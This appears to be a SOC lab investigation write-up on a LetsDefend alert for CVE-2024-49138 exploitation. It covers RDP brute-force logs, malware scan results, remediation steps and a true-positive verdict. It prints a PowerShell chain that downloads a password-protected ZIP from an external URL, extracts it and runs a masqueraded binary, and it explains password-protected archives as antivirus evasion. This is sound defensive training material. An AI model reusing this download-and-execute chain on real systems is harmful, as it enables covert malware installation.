Alert Name: SOC335 – CVE-2024-49138 Exploitation Detected
Severity: High
Event ID: 313
Event Time: Jan 22, 2025, 02:37 AM
Category: Privilege Escalation

Base Information

FieldValue
Event ID313
Event TimeJan 22, 2025, 02:37 AM
RuleSOC335 – CVE-2024-49138 Exploitation Detected
Analyst LevelSecurity Analyst
HostnameVictor
IP Address172.16.17.207
Process Namesvohost.exe
Process PathC:\temp\service_installer\svohost.exe
Process ID7640
Parent ProcessC:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
Command Line??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
File Hash (SHA-256)b432dcf4a0f0b601b1d79848467137a5e25cab5a0b7b1224be9d3b6540122db9
Process UserEC2AMAZ-ILGVOIN\LetsDefend
Trigger ReasonSuspicious behavior patterns linked to CVE-2024-49138
Device ActionAllowed

Incident Details

FieldValue
Incident NameEventID 313 – SOC335 CVE-2024-49138 Exploitation
Incident TypePrivilege Escalation
Created DateJan 08, 2026, 09:12 AM

Pre-Investigation Notes

  • Date: Jan 22, 2025, 02:37 AM
  • Hostname: Victor
  • IP Address: 172.16.17.207
  • Process Name: svohost.exe
  • Process ID: 7640
  • File Hash: b432dcf4a0f0b601b1d79848467137a5e25cab5a0b7b1224be9d3b6540122db9
  • User: EC2AMAZ-ILGVOIN\LetsDefend

Play Book

The process name is suspicious because it closely mimics svchost.exe by replacing one character, a common masquerading technique used by malware to blend in with legitimate Windows processes.

Check if the malware is quarantined or cleaned

FieldValue
TypeOS
Source Address185.107.56.141
Source Port0
Destination Address172.16.17.207
Destination Port0
TimeJan 22, 2025, 02:35 PM
UsernameVictor
Event ID4624
Logon Type10 (RemoteInteractive)
Source IP185.107.56.141

Malware Analysis

VirusTotal analysis confirms the file is highly suspicious based on community detections and behavioral indicators.

YARA Signature Match – THOR APT Scanner
Rule: SUSP_HKTL_Gen_Pattern_Feb25_2
Rule Set: Livehunt – Hacktools Indicators
Description: Generic hacktool behavior pattern
Detection Ratio: 51 / 74 engines

Hybrid Analysis reports indicate the executable behaves like a service installer abuse tool commonly used during privilege escalation attacks.

Command and Control Activity Review

Multiple authentication attempts were observed from the same external IP address prior to successful access.

Failed Login Attempts (Event ID 4625)

TimeUsernameSource IPDestination IPError CodeDescription
Jan 22, 2025, 02:35 PMadmin185.107.56.141172.16.17.2070xC000006DInvalid credentials
Jan 22, 2025, 02:35 PMadmin185.107.56.141172.16.17.2070xC000006DInvalid credentials
Jan 22, 2025, 02:35 PMguest185.107.56.141172.16.17.2070xC000006DInvalid credentials
Jan 22, 2025, 02:35 PMguest185.107.56.141172.16.17.2070xC000006DInvalid credentials

Successful Login (Event ID 4624)

TimeUsernameSource IPDestination IPLogon TypeDescription
Jan 22, 2025, 02:35 PMVictor185.107.56.141172.16.17.20710Successful RDP login

Containment Actions

  • User account was contained for further investigation
  • Host activity monitoring was enabled
  • Malicious process execution was blocked

Observed Execution Chain

powershell.exe downloaded and extracted a password-protected archive and executed the masqueraded binary from a temporary directory. PowerShell command used:

$url = 'https://files-ld.s3.us-east-2.amazonaws.com/service-installer.zip'
$dest = 'C:\temp\service-installer.zip'
$extractPath = 'C:\temp'
$password = 'infected'
Invoke-WebRequest -Uri $url -OutFile $dest
7z.exe x -pinfected -oC:\temp service-installer.zip
C:\temp\service_installer\svohost.exe

  1. Defines a download URL $url points to a ZIP file hosted online (service-installer.zip).

  2. Sets where the file will be saved $dest is the local path where the ZIP file will be downloaded: C:\temp\service-installer.zip

  3. Defines the extraction directory $extractPath is set to C:\temp, where the contents of the ZIP will be unpacked.

  4. Defines the ZIP password $password = ‘infected’ Password-protected ZIP files are commonly used to evade antivirus scanning during download.

  5. Downloads the ZIP file Invoke-WebRequest -Uri $url -OutFile $dest This pulls the ZIP archive from the remote server and saves it locally.

  6. Extracts the ZIP using 7-Zip

7z.exe x -pinfected -oC:\temp service-installer.zip x → extract files -p infected → use the password -oC:\temp → output directory This unpacks the archive into C:\temp.

  1. Executes the extracted binary C:\temp\service_installer\svohost.exe This directly runs the executable after extraction.

Impact Assessment

  • Privilege escalation: Confirmed
  • Host compromise: Partial
  • Persistence risk: High
  • Lateral movement: Not observed
  • Data exposure: Unknown
  1. Immediately isolate the affected endpoint
  2. Reset credentials associated with the compromised user
  3. Remove all artifacts related to the malicious installer
  4. Patch systems vulnerable to CVE-2024-49138
  5. Enable enhanced logging and EDR protections
  6. Monitor for similar masquerading techniques across the environment

Final Verdict

True Positive – Confirmed Privilege Escalation Exploitation

The alert represents a successful exploitation attempt leveraging a disguised service binary associated with CVE-2024-49138. Immediate remediation and system hardening are required.

Analyst Note

The investigation confirmed the execution of a malicious binary impersonating a legitimate Windows service process. The activity originated from an external IP address, involved multiple failed authentication attempts, and resulted in a successful RDP login followed by malicious process execution. Evidence supports a confirmed privilege escalation scenario with a high risk of persistence if not remediated.